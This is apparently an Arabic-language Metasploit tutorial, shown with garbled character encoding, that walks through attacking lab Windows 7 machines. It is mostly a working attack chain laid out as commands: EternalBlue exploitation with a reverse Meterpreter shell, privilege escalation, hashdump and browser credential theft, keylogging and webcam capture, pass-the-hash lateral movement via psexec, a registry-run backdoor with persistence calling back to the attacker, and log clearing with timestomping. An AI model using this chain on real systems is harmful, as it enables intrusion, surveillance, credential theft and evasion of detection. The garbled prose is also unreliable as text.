๐ฏ ุดุฑุญ ุดุงูู: Nmap + msfconsole + ุฌููุน ุงูุฃูุงูุฑ

๐ ุงูุฌุฒุก 1: nmap ูุญุต ุงูุดุจูุฉ ุงููุงูู

ุงูุฎุทูุฉ 1: ุงูุชุดุงู ุงูุฃุฌูุฒุฉ ุงููุดุทุฉ

```bash
# 1. ูุณุญ ุณุฑูุน ููุดุจูุฉ
nmap -sn 192.168.146.0/24
# ุฃู
nmap -sn 192.168.146.1-254
```

ุงููุชูุฌุฉ:

```
Nmap scan report for 192.168.146.128  # ูุงูู
Host is up (0.00020s latency)

Nmap scan report for 192.168.146.133  # Windows 7-1
Host is up (0.0015s latency)

Nmap scan report for 192.168.146.134  # Windows 7-2  
Host is up (0.0012s latency)
```

ุงูุฎุทูุฉ 2: ูุญุต ุงูููุงูุฐ ุงูููุชูุญุฉ

```bash
# ูุญุต ุฌููุน ุงูููุงูุฐ (ูุฃุฎุฐ ููุช)
nmap -sS -sV -O -p- 192.168.146.133

# ูุญุต ุณุฑูุน ููููุงูุฐ ุงููููุฉ ููุท
nmap -sS -sV -p21,22,23,25,80,135,139,445,3389 192.168.146.133
```

ุดุฑุญ ุงูุฎูุงุฑุงุช:

ยท -sS: SYN Scan (ุฃุฎู ูุฃุณุฑุน)
ยท -sV: ุงูุชุดุงู ูุณุฎุฉ ุงูุฎุฏูุฉ
ยท -O: ุงูุชุดุงู ูุธุงู ุงูุชุดุบูู
ยท -p-: ูู ุงูููุงูุฐ (1-65535)
ยท -p21,445,...: ููุงูุฐ ูุญุฏุฏุฉ ููุท

ุงูุฎุทูุฉ 3: ูุญุต ุซุบุฑุฉ MS17-010

```bash
# ูุญุต ูุจุงุดุฑ ููุซุบุฑุฉ
nmap --script smb-vuln-ms17-010 -p445 192.168.146.133
```

ุงููุชูุฌุฉ ุงููุชููุนุฉ:

```
Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
```

ุงูุฎุทูุฉ 4: ุฌูุน ูุนูููุงุช SMB

```bash
# ุฌููุน ุณูุฑุจุชุงุช SMB
nmap --script smb-* -p445 192.168.146.133

# ูุนูููุงุช ุงููุธุงู
nmap --script smb-os-discovery -p445 192.168.146.133

# ุงููุณุชุฎุฏููู
nmap --script smb-enum-users -p445 192.168.146.133

# ุงููุดุงุฑูุงุช
nmap --script smb-enum-shares -p445 192.168.146.133
```

---

โก ุงูุฌุฒุก 2: msfconsole ููุตู + ุฃูุงูุฑ ุฌุฏูุฏุฉ

2.1 ูููู msfconsole:

```bash
msfconsole
```

```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ        Metasploit Console       โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ  msf6 >                         โ  # ุงููุงุฌูุฉ ุงูุฑุฆูุณูุฉ
โ  msf6 exploit(exploit_name) >   โ  # ุฏุงุฎู exploit
โ  meterpreter >                  โ  # ุฏุงุฎู session
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```

2.2 ุฃูุงูุฑ msfconsole ุงูุฌุฏูุฏุฉ:

ุฃ. ุฅุฏุงุฑุฉ Workspace:

```bash
# ุฅูุดุงุก workspace ุฌุฏูุฏ
workspace -a Windows7_Lab

# ุนุฑุถ ุฌููุน workspaces
workspace

# ุงูุงูุชูุงู ูู workspace
workspace Windows7_Lab

# ุญุฐู workspace
workspace -d Old_Lab
```

ุจ. ุฅุฏุงุฑุฉ Database:

```bash
# ุญุงูุฉ ุงูู database
db_status

# ุงุณุชูุฑุงุฏ ูุชุงุฆุฌ nmap
db_import /tmp/nmap_scan.xml

# ุนุฑุถ ุงูู hosts
hosts

# ุนุฑุถ ุงูู services
services

# ุนุฑุถ ุงูู vulns
vulns
```

ุฌ. ุงูุจุญุซ ุงููุชูุฏู:

```bash
# ุจุญุซ ุจููุงุชุฑ
search name:eternalblue type:exploit platform:windows

# ุจุญุซ ุญุณุจ CVE
search cve:2017-0144

# ุจุญุซ ุญุณุจ ุงูู rank
search rank:excellent
```

ุฏ. ุฅุฏุงุฑุฉ ุงูุฌูุณุงุช:

```bash
# ุนุฑุถ ุฌููุน ุงูุฌูุณุงุช
sessions

# ุนุฑุถ ุจุงูุชูุตูู
sessions -l

# ุงูุฏุฎูู ูุฌูุณุฉ
sessions -i 1

# ูุชู ุฌูุณุฉ
sessions -k 1

# ูุชู ุฌููุน ุงูุฌูุณุงุช
sessions -K

# ุชุฑููุฉ ุฌูุณุฉ shell ุฅูู meterpreter
sessions -u 1
```

ูู. ุงูู Jobs:

```bash
# ุนุฑุถ ุงูู jobs ุงููุดุทุฉ
jobs

# ูุชู job
jobs -k 1

# ูุชู ุฌููุน jobs
jobs -K
```

---

๐๏ธ ุงูุฌุฒุก 3: ุฌููุน ุฃูุงูุฑ Meterpreter (ูุญุฏุซ)

3.1 System Commands:

```bash
sysinfo          # ูุนูููุงุช ุงููุธุงู
getuid           # ุงููุณุชุฎุฏู ุงูุญุงูู
getpid           # PID ุงูุญุงูู
localtime        # ููุช ุงููุธุงู
idletime         # ููุช ุงูุฎููู
reboot           # ุฅุนุงุฏุฉ ุชุดุบูู
shutdown         # ุฅููุงู ุงูุชุดุบูู
```

3.2 Process Commands (ุชูุตูู):

```bash
# ุนุฑุถ ุฌููุน ุงูุนูููุงุช
ps
ps -S            # ุจุชุฑุชูุจ ุญุณุจ ุงูุฐุงูุฑุฉ
ps -A            # ุนุฑุถ ูู ุดูุก

# ูุชู ุนูููุฉ
kill 1234        # ุจู PID
kill -f explorer.exe  # ุจุงูุงุณู

# ุจุญุซ ุนู ุนูููุงุช
ps | grep -i chrome  # ุจุญุซ ุนู ูุฑูู

# ุชูุงุตูู ุนูููุฉ
getprivs          # ุตูุงุญูุงุช ุงูุนูููุฉ
steal_token       # ุณุฑูุฉ token ูู ุนูููุฉ

# ุงูุงูุชูุงู (ููู ุฌุฏุงู)
migrate 580       # ุงูุงูุชูุงู ูู services.exe
migrate -N explorer.exe  # ุงูุงูุชูุงู ูู explorer.exe
migrate -f        # ุงูุงูุชูุงู ุชููุงุฆู ูุฃูู ุนูููุฉ ููุงุณุจุฉ
```

3.3 File System Commands:

```bash
# ุงูุชููู
pwd               # ุงููุณุงุฑ ุงูุญุงูู
cd C:\\Users      # ุชุบููุฑ ุงููุฌูุฏ
lpwd              # ุงููุณุงุฑ ุงููุญูู (ูู ูุงูู)
lcd /home/kali    # ุชุบููุฑ ุงููุณุงุฑ ุงููุญูู

# ุนุฑุถ ุงููููุงุช
ls                # ูุงุฆูุฉ ุงููููุงุช
ls -la            # ุจุชูุงุตูู ุฃูุซุฑ
lls               # ls ูููุณุงุฑ ุงููุญูู

# ุงููููุงุช
cat file.txt      # ุนุฑุถ ูุญุชูู ููู
edit file.txt     # ุชุนุฏูู ููู (ุจู vi)
rm file.txt       # ุญุฐู ููู
rm -rf folder     # ุญุฐู ูุฌูุฏ
mv old new        # ููู/ุชุณููุฉ
cp src dst        # ูุณุฎ

# ุงูุจุญุซ
search -f *.txt                     # ุจุญุซ ุนู txt
search -f *pass* -d C:\\Users       # ุจุญุซ ุนู pass ูู Users
search -f *.pdf -s 10000000         # ูููุงุช pdf ุฃูุจุฑ ูู 10MB

# ุงูุชูุฒูู/ุงูุฑูุน
download "C:\\file.txt" .           # ุชูุฒูู
download -r "C:\\Documents" ./docs  # ุชูุฒูู ูุฌูุฏ
upload /home/kali/backdoor.exe "C:\\Temp\\"  # ุฑูุน
```

3.4 Network Commands:

```bash
# ูุนูููุงุช ุงูุดุจูุฉ
ipconfig          # ุนูุงููู IP
netstat           # ุงุชุตุงูุงุช ุงูุดุจูุฉ
getproxy          # ุฅุนุฏุงุฏุงุช ุงูู Proxy
portfwd           # ุชูุฌูู ุงูููุงูุฐ

# ูุซุงู: ุชูุฌูู ูููุฐ
portfwd add -l 3389 -p 3389 -r 192.168.146.133
# ุงูุขู ููููู ุงูุงุชุตุงู ุจู localhost:3389 ูููุตูู ูู RDP ุงููุฏู

# ุงูู routing
route             # ุนุฑุถ routes
run autoroute -s 192.168.146.0/24  # ุฅุถุงูุฉ route
```

3.5 Desktop Commands:

```bash
# ุงูุดุงุดุฉ
screenshot        # ููุทุฉ ุดุงุดุฉ
screengrab        # ููุณ screenshot
screenshare       # ูุดุงุฑูุฉ ุงูุดุงุดุฉ ุญูุฉ

# ุงููุงูุณ
mouse_move x y    # ุชุญุฑูู ุงููุงูุณ
mouse_click left  # ุถุบุท ุฒุฑ
mouse_doubleclick # ุถุบุท ูุฒุฏูุฌ

# ุงูููุจูุฑุฏ
keyevent          # ุฅุฑุณุงู ุญุฏุซ ุฒุฑ
keyscan_start     # ุจุฏุก ุชุณุฌูู ุงูุถุบุทุงุช
keyscan_dump      # ุนุฑุถ ุงููุณุฌู
keyscan_stop      # ุฅููุงู ุงูุชุณุฌูู
```

3.6 Webcam/Mic Commands:

```bash
# ุงููุงููุฑุง
webcam_list       # ุนุฑุถ ุงููุงููุฑุงุช
webcam_snap       # ุตูุฑุฉ
webcam_stream     # ุจุซ ูุจุงุดุฑ

# ุงููููุฑูููู
record_mic        # ุชุณุฌูู ุตูุช
```

3.7 Privilege Escalation:

```bash
# ุงูุชุตุนูุฏ
getsystem         # ุชุตุนูุฏ ูู SYSTEM (ุงูููู)
getsystem -t 1    # ุจุชูููุฉ ูุญุฏุฏุฉ (1-5)

# ุฅุฐุง ูุดู getsystem
bypassuac         # ุชุฌุงูุฒ UAC
run post/windows/escalate/getsystem  # module ููุชุตุนูุฏ

# ุณุฑูุฉ ุงูู tokens
steal_token       # ูู ุนูููุฉ ุฃุฎุฑู
incognito         # ุฅุฏุงุฑุฉ ุงูู tokens
```

3.8 Credential Commands:

```bash
# ุงูู hashes
hashdump          # ุณุฑูุฉ hashes
run post/windows/gather/hashdump  # module ูุชูุฏู

# ุงูู passwords
run post/windows/gather/credentials/windows_autologin  # ูููุงุช ุชุณุฌูู ุงูุฏุฎูู
run post/windows/gather/enum_chrome                    # ูููุงุช ูุฑูู
run post/windows/gather/enum_firefox                   # ูุงูุฑูููุณ
```

3.9 ุงููุตูู ููู Shell:

```bash
# ุทุฑู ูุชุญ shell
shell             # shell ุจุณูุท (ูุฏ ูุนูู)
execute -f cmd.exe -i  # ุฃูุถู (ููุชุญ cmd)
execute -H -f cmd.exe -c  # ูุฎูู

# ุฅุฐุง ุนูู shellุ ุงุถุบุท:
Ctrl+Z            # ููุฎุฑูุฌ
# ุฃู ูู meterpreter:
Ctrl+C            # ููุชู shell ููุนูุฏ ูู meterpreter
```

3.10 Registry Commands:

```bash
# ุงูุชุญูู ูู ุงูุฑูุฌุณุชุฑู
reg enumkey -k HKLM\\Software  # ุนุฑุถ ููุงุชูุญ
reg queryval -k HKLM\\... -v ValueName  # ูุฑุงุกุฉ ูููุฉ
reg setval -k HKLM\\... -v Name -d Data  # ูุชุงุจุฉ ูููุฉ
reg deleteval -k HKLM\\... -v Name      # ุญุฐู ูููุฉ
```

3.11 Miscellaneous:

```bash
# ูุนูููุงุช ุฅุถุงููุฉ
checkvm           # ุชุญูู ุฅุฐุง ูุงู VM
getenv            # ุนุฑุถ environment variables
getprivs          # ุตูุงุญูุงุช ุงูุนูููุฉ

# ุงูู timestomp
timestomp file.txt -v                # ุนุฑุถ ููุช ุงูููู
timestomp file.txt -z "01/01/2020"   # ุชุบููุฑ ุงูููุช

# ุฅุฎูุงุก
clearev           # ูุณุญ Event Logs
```

---

๐ฏ ุงูุฌุฒุก 4: ุณููุงุฑูู ูุงูู ูุน ุฌููุน ุงูุฃูุงูุฑ

ุงูููู 1: ุงูุงูุชุดุงู ูุงูุงุฎุชุฑุงู

```bash
# 1. nmap scan
nmap -sn 192.168.146.0/24
nmap -sS -sV -p445 192.168.146.133
nmap --script smb-vuln-ms17-010 -p445 192.168.146.133

# 2. msfconsole
msfconsole
workspace -a Windows7_Test
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.146.133
set LHOST 192.168.146.128
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
```

ุงูููู 2: ุงูุงุณุชูุดุงู ูุงูุชุญูู

```bash
# ุฏุงุฎู meterpreter
sysinfo
getuid
getsystem
hashdump

# ุงูุนูููุงุช
ps
migrate 580  # ูู services.exe

# ุงููููุงุช
cd C:\\Users
ls
download "Desktop\\secrets.txt" .

# ุงูู shell
execute -f cmd.exe -i
whoami
ipconfig
exit

# ุงูุชุฌุณุณ
screenshot
keyscan_start
# ุงูุชุธุฑ 5 ุฏูุงุฆู
keyscan_dump
keyscan_stop
```

ุงูููู 3: ุงูุงูุชุดุงุฑ

```bash
# 1. ุณุฑูุฉ hashes ูู ุงูุฌูุงุฒ ุงูุฃูู
background

# 2. ุงุณุชุฎุฏุงู ุงูู hash ููุฌูุงุฒ ุงูุซุงูู
use exploit/windows/smb/psexec
set RHOSTS 192.168.146.134
set SMBUser Administrator
set SMBPass [HASH_FROM_WIN7_1]
exploit

# 3. ุงูุซุจุงุชูุฉ ุนูู ุงูุฌูุงุฒูู
meterpreter > run persistence -X -i 30 -p 4444 -r 192.168.146.128
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v Update -d "C:\\Windows\\Temp\\backdoor.exe"
```

---

โ๏ธ ุงูุฌุฒุก 5: ุญููู ุงููุดุงูู ุงูุดุงุฆุนุฉ

ูุดููุฉ: kill PID ูุง ูุนูู

```bash
# ุงุชุจุน ูุฐู ุงูุฎุทูุงุช:
ps                    # 1. ุชุฃูุฏ ูู PID
getprivs              # 2. ุชุฃูุฏ ูู ุงูุตูุงุญูุงุช
getsystem             # 3. ุงุตุนุฏ ุงูุตูุงุญูุงุช ุฃููุงู
kill 1234             # 4. ุฌุฑุจ ูุฑุฉ ุฃุฎุฑู

# ุฅุฐุง ูุง ุฒุงู ูุง ูุนูู:
shell                 # 5. ุงูุชุญ cmd
taskkill /f /pid 1234 # 6. ูุชู ูู cmd
```

ูุดููุฉ: ls ูุธูุฑ ุฎุทุฃ

```bash
# ุงูุฃุณุจุงุจ ูุงูุญููู:
# 1. ุงููุณุงุฑ ุบูุฑ ููุฌูุฏ โ pwd ุซู cd ููุณุงุฑ ุตุญูุญ
# 2. ุตูุงุญูุงุช ุบูุฑ ูุงููุฉ โ getsystem
# 3. ุงููุฌูุฏ ูุงุฑุบ โ ุทุจูุนู
```

ูุดููุฉ: upload ูุดู

```bash
# ุฌุฑุจ ูู ูุฐู:
getsystem  # 1. ุตูุงุญูุงุช
# 2. ุงุณุชุฎุฏู ุงููุณุงุฑ ุงูุตุญูุญ
upload /home/kali/file.exe C:\\Windows\\Temp\\file.exe
# 3. ุฌุฑุจ ูู exe
# 4. ุญุฌู ุงูููู ูุจูุฑุ ูุณูู
```

ูุดููุฉ: ุงูุฌูุณุฉ ุชููุทุน

```bash
# ุงูุญููู:
# 1. ุงุณุชุฎุฏู migrate ููุฑ ุงูุฏุฎูู
migrate -f
# 2. ุงุณุชุฎุฏู AutoRunScript
set AutoRunScript migrate -f
# 3. ุฌุฑุจ payload ูุฎุชูู
set PAYLOAD windows/shell/reverse_tcp
```

---

๐ ุงูุฌุฒุก 6: ุฌุฏูู ูุฑุฌุนู ุณุฑูุน

ุฃูู ุฃูุงูุฑ nmap:

```bash
nmap -sn [NETWORK]        # ุงูุชุดุงู ุฃุฌูุฒุฉ
nmap -sS -sV [TARGET]     # ูุณุญ ุงูููุงูุฐ
nmap --script smb-vuln*   # ูุญุต ุซุบุฑุงุช SMB
nmap -O [TARGET]          # ุงูุชุดุงู ูุธุงู ุงูุชุดุบูู
```

ุฃูู ุฃูุงูุฑ msfconsole:

```bash
search [TERM]             # ุจุญุซ
use [EXPLOIT]             # ุงุณุชุฎุฏุงู
show options              # ุนุฑุถ ุงูุฅุนุฏุงุฏุงุช
set [OPTION] [VALUE]      # ุชุนููู ูููุฉ
exploit                   # ุชูููุฐ
sessions                  # ุนุฑุถ ุงูุฌูุณุงุช
back                      # ุงูุฑุฌูุน
```

ุฃูู ุฃูุงูุฑ meterpreter:

```bash
# ุงููุธุงู
sysinfo, getuid, getsystem
# ุงูุนูููุงุช
ps, kill, migrate
# ุงููููุงุช
ls, cd, download, upload
# ุงูุดุจูุฉ
ipconfig, portfwd
# ุงูุชุฌุณุณ
screenshot, keyscan_start
# ุงููุตูู
shell, execute
# ุงูุชุตุนูุฏ
getsystem, hashdump
```

---

๐ ุงูุฌุฒุก 7: ูุตุงุฆุญ ูููู ุณุฑูุน

1. ุซูุงุซูุฉ ุงูุงุฎุชุฑุงู:

```
ููุทุฉ ุงูุฏุฎูู โ ุชุตุนูุฏ ุงูุตูุงุญูุงุช โ ุงูุงูุชุดุงุฑ
   (exploit)      (getsystem)    (hashdump โ psexec)
```

2. ุฅุฐุง ูุณููุช ุฃูุฑุงู:

```bash
# ูู meterpreter
help           # ูู ุงูุฃูุงูุฑ
help [COMMAND] # ุดุฑุญ ุฃูุฑ ูุญุฏุฏ

# ูู msfconsole
help
show -h
```

3. ุชุณุฌูู ูู ุดูุก:

```bash
# ูู meterpreter
get_session_log    # ูุญูุธ ูู ูุง ูุชุจุชู
spool /tmp/log.txt # ูุจุฏุฃ ุงูุชุณุฌูู
spool off          # ูููู ุงูุชุณุฌูู
```

---

๐ ุงูุฎูุงุตุฉ ุงูููุงุฆูุฉ:

ููุจุฏุก ุงูุขู:

```bash
# 1. ุงูุชุดู
nmap -sn 192.168.146.0/24

# 2. ุงูุญุต
nmap --script smb-vuln-ms17-010 -p445 [TARGET]

# 3. ุงุฎุชุฑู
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [TARGET]
set LHOST 192.168.146.128
exploit

# 4. ุชุญูู
getsystem
hashdump
ps
migrate [PID]
download/upload
```

ุงูุชุณูุณู ุงูููุทูู:

```
nmap โ ุงูุชุดุงู โ msfconsole โ exploit โ meterpreter โ 
getsystem โ hashdump โ ps โ migrate โ download โ 
background โ psexec โ ุงูุงูุชุดุงุฑ
```

ุงูุขู ุฌุฑุจ ูู ุฃูุฑ ุจููุณู. ุฅุฐุง ูุงุฌูุช ุฎุทุฃุ ูู ูู: 1) ุฃู ุฃูุฑ ูุชุจุชู 2) ุฃู ุฎุทุฃ ุธูุฑ 3) ูู ุฃู ูุฑุญูุฉ ููุช.